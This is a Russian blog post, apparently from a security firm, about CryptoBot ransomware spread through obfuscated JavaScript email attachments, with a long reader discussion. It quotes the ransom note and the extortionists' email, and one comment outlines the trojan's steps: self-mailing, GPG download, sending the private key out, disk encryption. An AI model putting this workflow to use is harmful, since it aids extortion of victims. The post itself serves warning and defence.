Вирус-вымогатель CryptoBot сдаёт своих жертв через Twitter

    image

    Вирусы-вымогатели, которые шифруют файлы пользователей, требуя денег за расшифровку, терроризируют Интернет уже не первый год. Однако в нынешнем октябре они разбушевались не на шутку – очевидно, совершив новый эволюционный скачок в области автоматизации. В начале месяца массовому заражению криптолокером подверглись сотрудники крупнейшей австралийской вещательной компании ABC, а и также почтовые и другие государственные службы страны. В середине месяца более 100 тыс. американцев были заражены вирусом-шифровальщиком через рекламные баннеры, крутившиеся в роликах на YouTube.

    Ну а в последние дни октября случилась активизация опасного шифровальщика в российском сегменте Интернета. Пользователи получают по почте вредоносный файл, который представляет собой обфусцированный JavaScript размером 2.5 кб (MD5 ea834605f6bee2d4680aae0936655a30). При запуске троян загружает из Интернета и запускает дополнительные компоненты:

    image

    Описание вируса присутствует на Virustotal, там же в комментариях приводится и деобфусцированная версия скрипта. Можно заметить, что файл неоднократно загружался на ресурс 29 и 30 октября 2014 г:

    image

    А вот как выглядят имена зараженных файлов, приходящих в почте – в основном они изображают деловые документы, причём якобы проверенные антивирусом (Avast.Scanned.OK)

    image

    После того, как пользователь откроет приложенный файл и запустит вредоносный скрипт, его информируют о том, что его документы, фото, базы данных, а также другие важные файлы «были зашифрованы с использованием криптостойкого алгоритма RSA-1024».

    image

    Далее пользователю предлагается подробная инструкция по спасению своих цифровых активов, которая сводится к следующему набору действий:

    1. Ваши файлы зашифрованы. Отправьте нам письмо с KEY и UNIQUE в течение суток.
    2. Нашли KEY.PRIVATE и UNIQUE.KEY на своем ПК, взяли пару зашифрованных файлов — отправили на почту paycrypt@gmail.com
    3. Через некоторое время получаете ответ с гарантиями, инструкцией и стоимостью. Посетите наш Twitter. Посмотрите, что все получают ключи. После оплаты получаете ключ дешифрования, ПО и инструкцию по дешифрованию.

    Наиболее интересным в этой инструкции является пункт 3, в котором указан Twitter-аккаунт, публично разглашающий информацию об адресах электронной почты жертв атак. Это не только позволяет продолжать монетизацию (например, с помощью рассылки спама на адреса жертв, часть из которых указывало служебные адреса электронной почты), но может и нанести существенный вред репутации пострадавших.

    В частности, некоторые исследователи уже занялись анализом списка жертв – среди них оказалось много IT-компаний, включая и такие, которые сами занимаются информационной безопасностью.

    Как и в большинстве атак по электронной почте, в данном случае использовались версии вредоносного ПО, которое в момент атаки не детектировалось большинством антивирусов. В связи с этим эксперты Positive Technologies советуют не открывать письма с непонятными вложениями — даже от знакомых адресатов. А на инфраструктурном уровне, в дополнение к антивирусным решениям, рекомендуется применять специализированные песочницы для проверки входящей почты, а также ограничить получение почтовых вложений, содержащих исполняемый код, в том числе в архивах.
    Positive Technologies 278,87
    Компания
    Поделиться публикацией

    Вакансии компании Positive Technologies

    Комментарии 180
    • –9
      Извиняюсь, не смог удержаться, ваша компания тоже в списке?
      А если серьезно, то для чего этот пост?
      Может, смогли добыть мастер ключи у злоумышленников?
      Люди бы были вам признательны.
      Вот все пишут и пишут
      forum.drweb.com/index.php?showtopic=318074&page=1
      Даже готовы купить доктора веба за лекарство.
      А его нет и не будет, пока сервера авторов шифровальщика не будут взломаны и не будут найдены мастер ключи.
      Есть идеи?
      • –3
        Мастер-ключ поможет от одного вируса, а их десятки и будут сотни.
        На мой взгляд, поимка пары организаторов и широкое освещение этого в прессе гораздо сильнее снизит активность их коллег.
        Нынешний всплеск спровоцирован относительно широким распространением крипто«валюты» биткоин, дающей мошенникам иллюзию безопасности при получении денег.
        Подобные вирусы-шифровальщики были и ранее, но без анонимных средств платежей они были банально нерентабельны для мошенников: вымогательство крупных сумм могло привлечь внимание правоохранительных органов, которые относительно легко могли отследить конечную точку платежей жертв, а с мелкими суммами возни было больше, чем прибыли.
        Теперь иначе: биткоин даёт чувство безопасности и неуязвимости, и бандиты значительно взвинтили ценники за расшифровку (речь идёт о тысячах долларов) и свою активность.
        Тем не менее, пример Silk Road показывает, что это не преграда, и при желании можно размотать цепочку до конца. Вот только правоохранители судя по всему за наши деньги охраняют вовсе не наши права, а кого-то другого.
        • +16
          Не подменяйте понятия. Если пользователи дебилы то битконй тут не причем!
          Когда эти же пользователи едут в машине они понимают что надо научится и надо соблюдать правила. И ни кто не плачет от того что тысячи дебилов бьются на смерть не получив права или нарушая правила ПДД.
          А тут не научившись и нарушив все разумны правила лезут в сеть — а в результате виноват какой то биткойн?!?!?
          P.S. Не хочешь получать права пересаживайся на автобус, не хочешь соблюдать правила безопасности отключи комп от сети.
          • –10
            Основной посыл вашего комментария — пользователи дебилы, лезут в сеть без знаний. Использу вашу же аналогию, приведу наглядный пример — Для езды на машине необходимо не только знать ПДД, но и уметь разбирать/ремонтировать/собирать двигатель и коробку передач.
            Посыл моего комментария в том, что все не обязана быть профессиоалами и учить правила «серфинга», а также разбираться в постоянно-обновляемой информации по безопасности в интернете. Я вас уверяю, что надется кто-то умнее вас и вы точно также можете попасть в ловушку.
            А вообще, в вашем сообщении прямо веет безапелляционной уверенностью в собственной правоте. Пардлон, ничего личного, только факты :)
            • +9
              Если вы не «уметь разбирать/ремонтировать/собирать двигатель и коробку передач», то вы платите тому, кто «уметь». Если вы не «знать ПДД», то в сеть на дорогу вас опасно выпускать. Так же и с Сетью: не знаете правил техники безопасности поведения в сети — можете обрезать кабель и сохранить ваши волосы мягкими и шелковистыми. А уж коли подцепили заразу и не можете вылечиться сами — платите «доктору» :)
              • –8
                Отлично. Как раз скоро в интернет вы будете заходить строго по паспорту и отпечаткам пальцев. Ну плюс еще и права введут
                • 0
                  Я не за столь крайние меры, как экзамен на пользователя интернетов. :)
                  Подцепить вирус — это как отрубить пальцы, пытаясь наколоть дров или получить удар током, меняя лампочку: кто виноват в том, что пользователь не умеет пользоваться инструментом?
                  • +2
                    Производитель инструментов обязан стремиться к максимальной безопасности пользователя. Делают розетки с закрывающимися дырками, бытовая техника, как правило, не дает доступа пользователю к движущимся частям. Делают «защиту от дурака». Вот и в интернете, возможно, следует к этому стремиться.
                    • 0
                      И после какого-то предела пользоваться такими инструментами банально неудобно, особенно при даже небольшом выходе за пределы «рекомендуемого сценария использования».
                      • +1
                        Это смотря кому. Профессионалу неудобно, а рядовому потребителю, не специализирующемуся в области применения инструмента, вполне себе сносно. Никто из рядовых потребителей пока не жаловался на концевики в дверцах СВЧ печек или все те же шторки на розетках. Если граждан обязать при пользовании критичными сервисами в интернете проходить идентификацию фингерпринт, граждане будут только рады.
                        • 0
                          Никто из рядовых потребителей пока не жаловался на… все те же шторки на розетках.

                          Конечно, их особо не покупают, может быть, только в детсады и прочие подобные заведения, где требуется по каким-нибудь нормам. А кто купил домой — рано или поздно выламывают их просто, да и всё, чего тут жаловаться.

                          Как раз вот эта конкретная «защита» — ужасна. Как говорится, «розетки стали недоступны большинству детей, теперь погибают только самые одарённые».
                          • 0
                            Не думаю, что все выламывают, у меня переноска была с такими розетками, особых неудобств не ощущалось, эксплуатировал лет 10 наверное. Переноска постоянно валялась на полу, всего там было 6 розеток, задействовано обычно было розетки 3-4, остальные закрыты. Сейчас нет большой необходимости часто втыкать-вынимать вилки из розеток, многие приборы включены постоянно. В любом случае, все определяется соотношением неудобства и степени риска. Запасной парашют это тоже неудобно.
                  • –2
                    Не путайте понятия получить права и воспользоватся правом.
                    Я сдал на права и получил их. А вот в какую машину я сяду это уже не дело государства.
                  • –1
                    Про «доктора» и не «умею разбирать» сам это относится к любой области человеческй деятельности. Именно поэтому возникли профессии и деньги :) Граждане раздающие минусы без комментария — мне глубоко плевать на ваши тихушне клики.
                  • +5
                    Для езды на машине необходимо не только знать ПДД, но и уметь разбирать/ремонтировать/собирать двигатель и коробку передач.
                    Все что после запятой для езды на машине не нужно.
                    Ну а если на уловку с почтовыми вложениями попадаются ИБ-конторы, то мне остается только развести руками и радоваться, что не пользуюсь deafaultOS.
                    • 0
                      Основной посыл. Если ты не можешь защищаться тебя поимеют, в интернете, метро, подворотне, рынке, магазине, а способ вывода найдется. Если ты сам не умеешь, не знаешь, попроси специалиста, он настроит так, что ты даже если захочешь, подцепить не сможешь.
                    • +3
                      Бикойн может и не причём, но пользователи тоже не всегда дебилы. Иногда и производители автомобилей косячат. Особенно в случае zero-day уязвимостей.
                      • +7
                        И ни кто не плачет от того что тысячи дебилов бьются на смерть не получив права или нарушая правила ПДД.

                        Вообще-то плачет. Потому что эти дебилы врезаются в нормальных людей, а не только в столбы и других дебилов. Если бы дебилы убивались самостоятельно, гаишников можно было бы отменить.

                        И хоть аналогия не самая очевидная, но в случае взломов ящиков дебилов, имеющих информацию или власть, последствия тоже могут быть не только для дебилов.

                        Поэтому создание дополнительных препятствий дебилам для совершения больших глупостей — это, к сожалению, серьёзная и важная задача.

                        И таки давайте не будем сильно задирать нос — компьютерный профан может быть прекрасным человеком и отличным специалистом в другой области. Нельзя просто так взять и превратить всех в сисадминов. Это неправдоподобно и неэффективно.
                        • +2
                          Уметь ставить замок на входную дверь и сигнализацию тоже не обязательно, можно заплатить тем, кто умеет.
                          Но просто держать дверь открытой днем и ночью, а потом обижаться — как-то тоже глупо.

                          И, на мой взгляд, это хорошо и правильно именно в таком виде, иначе получаются телефоны без видимой файловой системы, невозможность передать исполнимый файл в вк\гмейле, тупые с завода ножи, чтобы никто не порезался, вход в интернет по паспорту и прочие подобные вещи.

                          Делать «защиту от дурака» несомненно полезно и нужно, но только пока она не мешает пользованию вещью\сервисом.
                          • –2
                            Ну если с такой аналогией продолжать, то нормальные квартиры, даже в новых домах, продаются уже с замком на двери.

                            А Вам, я думаю, лучше не компьютер покупать, а набор smd-компонентов, паяльник и провода без изоляции — дальше уже сами сделаете что нужно.

                            Зачем человеку, который на работе должен отвечать на письма, знать все о компьютерной безопасности? Зачем ему запоминать, какие файлы можно открыть, а какие опасно? Он может никогда не слышал, что такое JS, да оно ему и не надо. Может он профессионал в другом деле и его задача прочитать письмо и написать свои мысли.
                            Это не прогресс нифига, если нужно изучать тонну информации, прежде чем начать использовать устройство созданное для автоматизации или упрощения чего-либо.
                            Вы изучаете параметры проводниковпроводников в кабеле утюга при его покупке? Какая там изоляция используется и какие внешние воздействия она выдерживает? Нет — это не Ваша задача. Для Вас он должен быть уже безопасен максимально.
                            По-вашему наверное нужно выпустить 5 томов книг: «известные типы файлов, которые могут находиться во вложении письма, правила работы с HEX-Editor и декомпиляция для секретарей» — не тот это путь, не тот.
                            А вот ещё интересно, Вы говорите простые правила безопасности работы в сети — а ну ка сформулируйте.
                            • +3
                              устройство созданное для автоматизации или упрощения

                              Вот тут вы капитально заблуждаетесь. Для автоматизации, но не для упрощения. Компьютеры появились изначально наоборот для усложнения — как средство, позволяющее производить гораздо более сложные рассчёты. Потом решили, что это может быть средством автоматизации. Кто сказал «упрощение»? Потом обнаружилось, что они могут выполнять хранение, обработку и передачу огромных объёмов данных — сегодня их применяют преимущественно для этого. Снова, об упрощении ни слова.

                              Да, компьютеры многое усложнили. Вообще жизнь обывателя постоянно усложняется — сегодня жить в среднем сложнее, чем сто лет назад: появились (в личном массовом пользовании) телефоны, автомобили, разные бытовые приборы; в то же время, большое число проблем, которые были актуальны тогда, актуальность не потеряли — нужно следить за собой (внешним видом, поведением и так далее), нужно как-то выводить пятна, не всё можно стирать в стиральной машине — не получится забыть, как стирать руками; в нашей стране и холодную-то воду отключают, не то, чтобы горячуюю — и мы снова греем воду для того, чтобы помыться. Много можно примеров привести.

                              Нет, я не изучаю параметры проводников в кабеле утюга. Но я изучаю его интерфейс, и уж точно знаю, что нельзя оставлять его включенным, особенно, когда он стоит на подошве; нельзя касаться руками этой самой подошвы и тому подобное.

                              На самом деле, проблема с безопасностью в сети в недостаточном интеллекте большинства людей. В случае с утюгом, чтобы увидеть осознать следствие и понять причину проблемы нужны секунды и не нужен какой-то серьёзный анализ: коснулся горячую часть рукой — больно, ожог на неделю — только уж полный идиот не научится. Между игнорированием правил безопасности при работе в интернете и потерей личных данных (и хорошо, если только личных) нет такой непосредственной, простой и очевидной связи. Чтобы эта связь проявилась, нужен анализ, а для него нужны хотя бы базовые знания, как этот компьютер и этот интернет работает. Да, интернет и компьютер — системы сложные, нужно тратить силы и время, чтобы это эффективно использовать. Да, это сложно и напрягаться лень, и у абстрактного бухгалтера Даздрапермы Владленовны находится туча отмазок, почему она делать этого не должна. Вот это и есть отсутствие интеллекта — неумение разобраться с чем-то новым, неумение обучаться. Ну вот раз так, научилась она считать на счётах, писать всё в бухгалтерские книги и ходить по инстанциям пешком — пусть ими и польузется, а компьютерные программы и онлайн банк-клиенты — не для неё.

                              Не нужна туча книг. Нужно, чтобы понимали, что среди файлов могут быть программы, и они могут быть вредоносными. А также, чтобы понимали, что электронная почта — это один из сервисов интернета. Значит, не нужно запускать всё попало, что пришло по электронной почте. А ещё нужно читать сообщения почтовой программы, и если она написала «этот файл может нанести вред вашему компьютеру», возможно, она не просто так это написала и надо бы позвать кого-то более компетентного.
                              • 0
                                А нахрена Даздраперме вообще возможность устанавливать программы? Тем более из атачей.Пусть лучше в бухгалтерии совершенствуется
                                • 0
                                  У нее при открытии внимание! вордовского файла из почты компьютер спрашивает «Разрешить этой программе внести изменения?» Она говорит Да! Где, в этот момент у нее находится мозг? Спит или на обед отошел видимо. Этот человек пишет в тетрадке под диктовку: «Что бы открыть файл, надо нажать: Файл — открыть.». Я серьезно. Этот человек как то дожил до 40 лет, вырастил детей, как то хватило ума жизнь прожить, налоги считать, бухгалтерию вести а как садится за комп\руль, мозг просто выключается. Если у этого пользователя нет квалифицированного админа, невозможно создать никаких мер безопасности.
                                  • 0
                                    Для нее ворд — как унитаз. Функция а не предмет интереса. Мало ли там какие изменения нужны ворду для открытия файла. Ей не нужно вообще этого вопроса так как она не должна ставить себе потенциально опасные программы. Представьте себе, если у унитаза будет удобная кнопка на видном месте, которая бы приводила к изменению потока вещества на противоположное, пусть даже и с предупреждением. Тогда для пользования этим унитазом пришлось бы идти на унитазные курсы, но все равно у какого-то процента пользователей эта функция срабатывала когда не надо.

                                    А так минимум функционала для конечного пользователя и отдельный интерфейс для сантехников с гаечным ключом.
                                    • 0
                                      Кнопку можно нажать случайно. Я понял вашу аналогию, она некорректная. Человек не промазал, он когда открывал письмо которого не ждал, от незнакомого человека, не преследовался жгучим интересом: «А что будет если согласиться?». Нет. Он банально не стал читать что у него спросили и не стал думать, почему у него у него это спросили. Он видел это окно сто раз и всегда все было нормально, Да что там говорить, даже если бы он его видел в первый раз, его выбор, все равно бы не изменился и тест он тоже читать бы не стал.
                                      • 0
                                        Угу и для таких людей надо все организовать чтобы было удобно. Такому пользователю не нужны никакие программы — ему нужны его счета-фактуры, договора и проч.

                                        так же как я не знаю из каких частей состоит унитаз и нужно ли ему вносить изменения для обработки очередной порции вещества.

                                        Теперь рассмотрим, насколько абсурден вопрос:
                                        «Разрешить этой программе внести изменения?»

                                        — Вы уверены, что при нормальном чтении файла ворда нет ничего, что можно назвать «Эта программа»
                                        — Вы уверены, что при чтении файла ворда не делается никаких изменений?

                                        И самое главное, нахрена бухгалтеру возможность устанавливать программы пришедшие через почту?
                                        • +1
                                          >>Угу и для таких людей надо все организовать чтобы было удобно. Такому пользователю не нужны никакие программы — ему нужны его счета-фактуры, договора и проч.
                                          Тут я с вами согласен, пусть открывает 1С, и нечего не трогает больше. Там подцепить вирус вообще вариантов нет. Нет же они счетами, договорами взяли моду меняться по электронной почте.

                                          Теперь рассмотрим, насколько абсурден вопрос:
                                          «Разрешить этой программе внести изменения?»

                                          С моей точки вполне себе логичный вопрос. Задается прямо: «Вот эта программа с таким то названием, происхождение которой неизвестно пытается внести изменения. Разрешить?» Я не знаю где тут абсурд. Если я скачал программу, доверяю ей, я отвечу да. Если такое сообщение появляется в результате чтения письма, которого ты не ждал и которое пришло от человека которого ты не знаешь, вариантов два:
                                          1. Вы сантехник, бухгалтер, дантист, программист вы понимаете, что для чтения документа или письма не нужно вносить никакие изменения особенно программе, «hKjfhd342KJhg666.exe» происхождение которой установить не удается. Более того, вы уже скорее всего открыли не одну сотню документов в ворде и такого вопроса при открытии не было ни разу.
                                          2. Вы сферический инопланетянин который не разу не открывал писем пришедших по электронной почте и не разу не пользовались вордом. Тогда да, возникает большой набор вопросов, разбор которых может привести к отладке кода в памяти, изучения системного программирования и тд. Придется задаться этими вопросами, проанализировать текст вопроса попробовать догадаться, построить причинно-следственные связи и тд. Тут даже можно поспорить о логичности формулировки вопроса.

                                          И самое главное, нахрена бухгалтеру возможность устанавливать программы пришедшие через почту?

                                          Мне тоже очень интересно, зачем им вообще возможность устанавливать какие либо программы.
                                          • –2
                                            >>>Тут я с вами согласен, пусть открывает 1С, и нечего не трогает больше. Там подцепить вирус вообще вариантов нет. Нет же они счетами, договорами взяли моду меняться по электронной почте.

                                            Коммуникация с внешними организациями вполне их задача

                                            >>>Вы сантехник, бухгалтер, дантист, программист вы понимаете, что для чтения документа или письма не нужно вносить никакие изменения особенно программе, «hKjfhd342KJhg666.exe» происхождение которой установить не удается.

                                            Вы понаблюдайте за реальным нетехническим пользователем, кроме тех для которых компьютер сам по себе не является предметом интереса.

                                            Я знал бухгалтера которая сама фиксила себе конфигурацию на 1C, но большинство не собирается оопускаться ниже по уровню абстракции и для них такие вопросы досаждают они не вполне уверены, какой ответ правильный и хотят быстрее открыть документ. Особенно, если нехватка времени.

                                            >>>Более того, вы уже скорее всего открыли не одну сотню документов в ворде и такого вопроса при открытии не было ни разу.

                                            Были какие-то другие вопросы значения которых вы понимаете не полностью.

                                            >>>Мне тоже очень интересно, зачем им вообще возможность устанавливать какие либо программы.

                                            Например, установить приложения для любимого телеканала в личном телефоне из проверяемого репозитория — вполне можно, я считаю.
                                            • +2
                                              Коммуникация с внешними организациями вполне их задача

                                              Разумеется, это был сарказм.

                                              Вы понаблюдайте за реальным нетехническим пользователем, кроме тех для которых компьютер сам по себе не является предметом интереса.

                                              Я 1Сник и сисадмин в одном лице, моя работа, наблюдать за такими пользователями, обучать, говорить, настраивать, запрещать и тд. Я это делаю каждый день. Адекватный пользователь читает вопросы который задает компьютер и даже! бывает, что записывает непонятные моменты и звонит мне, если не знает, что надо делать. Не делайте из пользователя идиота. Занятость пользователя никак не меняет этого положения дел, ну может он будет торопить с ответом. Вопрос компьютера он прочитает все равно.

                                              Были какие-то другие вопросы значения которых вы понимаете не полностью.

                                              За сотню раз, непонятных вопросов не осталось уже давно. При открытии документа ворда, никакие вопросы не задаются вообще.

                                              Например, установить приложения для любимого телеканала в личном телефоне из проверяемого репозитория — вполне можно, я считаю.

                                              В своем личном телефоне, как и компьютере, вы сами разумеется устанавливаете программы, сами решаете что такое «проверяемый репозиторий», сами разбираетесь, что такое «репозиторий», сами… ну и тд
                                              • 0
                                                Адекватный пользователь читает вопросы который задает компьютер и даже! бывает, что записывает непонятные моменты и звонит мне, если не знает, что надо делать. Не делайте из пользователя идиота.


                                                Тут вопрос насколько можно настроить систему, чтобы он не терял время на это, а вместо этого занимался своей предметной областью.

                                                Умный админ может приспособиться к «тупости» пользователя и тем повысить свою ценность

                                                Умный пользователь может приспособиться к «тупости» админа и компьютера и тем повысить свою ценность.
                                                • 0
                                                  При открытии документа ворда, никакие вопросы не задаются вообще.


                                                  Иногда какие-то задаются, например сконвертировать ли файл в новый формат. Разрешить ли печать, если файл получен из интернета и т.д.
                                                  • 0
                                                    Excel, по-моему, когда открываешь старый документ ничего в нём не меняешь и при закрытии он тебя спрашивает «Сохранить изменения?» — вот с какого перепугу появляется данное окно? Я ничего не менял, и в документе отменить ничего нельзя — что он хочет? И имеешь все шансы потерять свой файлик.
                                • 0
                                  Не надо передергивать.

                                  Я же написал — защита должна быть, это хорошо и полезно, но она не должна мешать пользоваться предметом.
                                  Защита даже может быть включена по умолчанию — но и отключение должно быть возможно и доступно.

                                  Хороший кабель утюга с качественной негорючей защитой мне никак не мешает использовать утюг, вот вообще никак.

                                  Запрет пересылать исполнимые файлы вконтакте и в гмейле мне мешает еще как, приходится делать дополнительные действия и это никак не отключить. Понимаете — сервис, сделанный для автоматизации, заставляет меня делать лишние действия — упаковывать экзешник в архив и иногда еще и расширение ему менять. Ну что за хрень?

                                  Решение проблем безопасности внутри конторы решается групповыми политиками, корпоративной почтой с любой встроенной паранойей, специальными людьми. Безопасность частных неопытных пользователей решается отключаемой безопасностью, или специальными версиями сервисов, или опять же специальными людьми. Я не предлагаю всем изучать по пять томов, я предлагаю не встраивать лишнюю безопасность намертво в вещи\сервисы, не оставляя альтернативы.

                                  Про правила я не писал ничего.
                                  • 0
                                    1. Обычному пользователю нафиг не нужно пересылать исполняемые файлы. А изоляция на шнуре утюга некоторым мешает им «нормально» пользоваться — сложно к его проводу подключить еще и лампу параллельно (аналогия с exe).

                                    2. Я не говорю про полную блокировку пересылки файлов exe, хотя для опытного юзера обойти это не доставит особых проблем. Сейчас с программами конечно лучше все стало, но помнится время Windows XP, когда я сам в спешке не заметил в The Bat продолжения имени файла после 10 пробелов, оканчивающегося на .com. Причем он даже не спросил меня ничего, сразу же выполнил. Через пару секунд я понял, что произошло, но было уже поздно. Пришлось тратить время на антивири и т.п.

                                    3. Я думаю, что простым неграмотным юзерам не нужно запрещать пользоваться интернетом, а нужно сделать запрет на установку любого ПО и все. Просто это не выгодно многим, видимо.
                                    • 0
                                      3. Я думаю, что простым неграмотным юзерам не нужно запрещать пользоваться интернетом, а нужно сделать запрет на установку любого ПО и все.


                                      Я бы разрешил из магазина
                          • +8
                            Непонятно, за что минусуют комментарий. Что, человек неправду сказал, что анонимность биткоин-транзакций во многом и позволяет проворачивать такие схемы? У меня у самого есть биткоины, и я хочу, чтобы эта валюта взлетела, но надо понимать, что побочным эффектом будут и вот такие вещи (а также Silk Road, с его «рынком наемных убийц» и прочими прелестями). И, да — этим должны заниматься соответствующие органы. Не биткоином, а теми, кто им пользуется в преступных целях.
                            • 0
                              Кстати, да, неправду. Он только неделю назад перестал «палить» всех своих пользователей (честно признаюсь, я сам хотел запушить патч, но смущали предыдущие попытки, когда его забраковывали (данный автор просто предоставил альтернативу, молодец)
                          • +9
                            Предложу лично вам несколько сценариев:
                            1. Вы получаете пару десятков суперкомпьютеров и брутите мастер-ключ в лоб с шансами 1/2^400+ его найти в первый год
                            2. Вы исследуете весь применявшийся при шифровании код и ищете в нем слабые места. Хорошему программисту месяца 3-4 понадобится, я думаю.
                            3. Вы поднимаете волну общественного резонанса, доходите до президента, дело берется на особый контроль. Силовые ведомства сбиваются с ног и ищут поганцев.
                            4. Вы начинаете кампанию по сбору средств на любые из перечисленных выше пунктов или поиск новых.

                            И, внезапно, у вас найдется очень много оправданий чтобы не делать ничего из этого. И у остальных не меньше…
                            • 0
                              Навряд ли вы сможете посмотреть алгоритм генерации ключа (ибо это на сервере делается). А разбор малвари, криптующей файлы, обычно проходит недолго — в ней используются стандартные алгоритмы (и реализации), которые легко идентифицировать, имея опыт за плечами.
                              • +1
                                Пока мы тут собираем на коленке супер-компьютер для брута, злобные хакеры сделали еще одну рассылку вот этого файла:
                                www.virustotal.com/ru/file/cd941becbb11dd43c4b7680a0483d4523e0814972f803cb58ac4cc78a85b5ff5/analysis/
                                Имена файлов похожие, код тоже, в принципе, идентичен (чуть переделан), но т.к файл свежий, то детектов только 8.

                                У автора данного топика после слов
                                Можно заметить, что файл неоднократно загружался на ресурс 29 и 30 октября 2014 г

                                есть скриншот, где видны даты заливки файла на virustotal, а жирным шрифтом — это сколько антивирусов файл детектировали, и можно увидеть, что изначально файл видели 5 антивирусов, потом 7, 10 и так по нарастающей.
                                Так вот вопрос: кто из антивирусов детектировал файл изначально, а не после того, как десятки озлобленных клиентов его в вирлаб прислали?

                                • 0
                                  Первая загрузка (2014-10-29 04:31:05) детектировалась тремя антивирусами: Agnitum, Kaspersky, NANO-Antivirus.

                                  На тот момент, с которого делались наши скриншоты (2014-10-29 10:43:21), их было пять: Agnitum, DrWeb, Kaspersky, NANO-Antivirus, Qihoo-360.

                                  Таким образом, можно сказать, что российские антивирусы — в первых рядах по отлову данного зловреда.
                                • +1
                                  Как и говорилось: много оправданий. Вы бы сначала разобрались как именно этот троян работает, а потом бы уже писали про «недолго»…
                                  • +1
                                    Ладно, не ссорьтесь. Всегда ведь можно сказать, что, к примеру, Мартьянову разбираться с тем, как работает этот зловред совсем недолго — он это просто помнит с предыдущих версий.

                                    PS: Этот зловред распространяется еще с мая. В августе был сильный всплеск, в этом месяце тоже. Логика и архитектура с тех пор изменений практически не претерпела. Руки иногда чешутся сделать нормальный обзор со всех сторон этой ситуации, но как-то продолжают чесаться, но не доходят все :)
                                    • +16
                                      Какбэ я и есть тот самый Мартьянов :-) Использует троян GPG, кода там 5 метров в сорцах (не считая хидеров), так что разбираться там на несколько месяцев.
                                      • +3
                                        <offtopic>Вот за такие моменты мы и любим комментарии Хабра.</offtopic>
                                • –1
                                  Какой мастер-ключ? Это же RSA, там пара открытый\закрытый ключ используется, и они уникальны для одной машины.
                                  • 0
                                    Посмотрите как троян работает. Или почитайте что про него написано.
                              • +3
                                Вот интересно, Twitter никак не участвует в раскрытии?
                                • +1
                                  «Пользователи получают по почте вредоносный DOC-файл, который представляет собой обфусцированный JavaScript» — это как? Файл в архиве всегда имел расширение JS, его содержимое даже близко не является CFB-файлом. Следовательно, это обычный JS и никак не DOC.
                                  • 0
                                    Спасибо, исправили. Имелось в виду, что в названии файла может фигурировать doc (см. примеры названий), хотя это конечно не doc-файл
                                    • 0
                                      а мне всегда было интересно, почему default OS *ВЫПОЛНЯЕТ* .js-файлы (особенно, полученные по почте), а не открывает в текстовом редакторе (ну или хотя бы почтовый клиент мог бы спрашивать в чём открыть это вот непонятное поделие, что вы тут тыкнули два раза)? :)
                                      • 0
                                        Потому, что на предыдущих ОС не было powershell а основными скриптовыми языками были js, vbs и батники. Сейчас для этого есть powershell, который кстати, открывается по умолчанию блокнотом.

                                        Наколько я знаю, почтовые клиенты MS спрашивают, выполнить или нет присланнные выполняемые файлы.
                                    • +2
                                      «А на инфраструктурном уровне...» — вы серьезно считаете, что решение — песочницы и антивирусы, а не бэкапы, разделение прав и компьютерная грамотность?
                                      • +1
                                        Компьютерная грамотность — угроза финансовому состоянию компаний-производителей ПО для обеспечения «безопасности» :)
                                        Поэтому рекомендуют купить пару-тройку продвинутых защит, как наиболее понятное и простое решение для большинства одинаково-грамотных-вместе-с-сотрудниками директоров
                                      • +6
                                        А почему twitter-акаунт не заблочат? Или это никак не противоречит правилам?
                                        • +10
                                          Поймали такой на один из компьютеров около месяца назад. От компании, с которой вы работаете, причём от вашего же менеджера приходит архив с файлом типа «Акт_сверки_многобукв.doc.js». При открытии пытается разослать себя вашим контактам. Затем скачивает gpg, eraser, генерит ключи, приватный куда-то отправляет и вайпит, далее сканит диски и генерит батник, который зашифровывает всё. Спасло то, что со старта нарвался на очень большие файлы и не успел ничего особо испортить. Пользователь успел почуять неладное и выключить комп.
                                          Что интересно, на тот момент детектировался только касперским.
                                          Поддержка office365 долго доказывала, что они отфильтровывают исполняемое содержимое, давала советы из разряда «попробуйте выключить и включить», но потом признала, что с js inside zip ничего сделать не могут.
                                          • 0
                                            А при чем тут office365?
                                            • +3
                                              Там почта.
                                              • 0
                                                А… На самом деле, фильтрация на уровне почты бесполезна: в следующий раз там будет архив с паролем.
                                                • +4
                                                  Нет, не бесполезна. Но не панацея.
                                            • 0
                                              Как тут выше заметили, проблема решается разворачиванием зашифрованных файлов из вчерашнего бекапа. Но так или иначе, надеюсь, пользователь получил заслуженное лишение премии за то, что запустил js-файл?
                                              • 0
                                                Однажды майкрософт разграничит доступ к файлам по приложениям. Удивительно что это не было сделано раньше. И интерфейс где надо драгэнддропом перетянуть ворд из опенофиса на возможность редактировать doc. А лучше не по расширению, а по метатегам.
                                                • +2
                                                  Каким метатегам? Если вы про Content-Type заголовок в письмах или про определение типа содержимого по примитивным сигнатурам вида «если в начале файла %PDF-, то это application/pdf» (примерно так делает утилита file и все остальные, если он используют библиотеку libmagic), то злоумышленникам так даже легче будет (пользователи привыкли смотреть расширение, а тут javascript с .doc, причём расширение даже прятать не надо).
                                                  • 0
                                                    А как знатно можно будет MZPE в JPG положить ;-)
                                                    • 0
                                                      Нет, я про политики доступа при которых вирус будет просить дать ему доступ к документам.
                                                    • 0
                                                      у яблока так
                                                  • +5
                                                    Есть одна компания, которая решила, что нельзя пересылать некоторые типы вложений:
                                                    — большое количество бинарных и исполнимых файлов (.ade, .adp, .bat, .chm, .cmd, .com, .cpl, .exe, .hta, .ins, .isp, .jse, .lib, .lnk, .mde, .msc, .msp, .mst, .pif, .scr, .sct, .shb, .sys, .vb, .vbe, .vbs, .vxd, .wsc, .wsf, .wsh), в том числе в архивах (.zip, .tar, .tgz, .taz, .z, .gz, .rar);
                                                    — zip в zip, если вложенный закрыт паролем.

                                                    В итоге, приходится либо пользоваться их сервисом для передачи файлов, либо шифровать и менять расширения файлов.
                                                    • 0
                                                      Архив с паролем отправляет эту компанию далеко и надолго :-)
                                                      • 0
                                                        Не всегда. Я как раз работаю в такой компании — чтобы послать dll коллеге приходится знатно выкручиваться. Причём степень параноидальности непредсказуемо меняется с течением времени — сегодня было достаточно просто упаковать в архив с паролем, а завтра фокус может не пройти, приходится менять разрешение с zip на zzz, либо вообще на doc, и т.д.
                                                        • +1
                                                          Да не, шифрование имен файлов в архиве должно спасать, после него там одна трэшня остается! Можно потестить, если хотите ;-)
                                                          • 0
                                                            Да выкрутиться-то всегда можно. Есть и корпоративные сервисы расшаривания документов и файлов. Там просто не очень удобно тем что телодвижений больше надо делать. Я ж не первый год, привык уже.
                                                            • 0
                                                              Для того что бы перекинуть файл в рашаренную папку нужно больше телодвижений чем перекинуть его через вложении в email?
                                                              На крайний случай есть skype для быстрой передачи файлов, гугл/яндекс/дропбокс/маил диск. Обычно на email отправляем только заказчикам всякие ТЗ, договора не более.
                                                              • 0
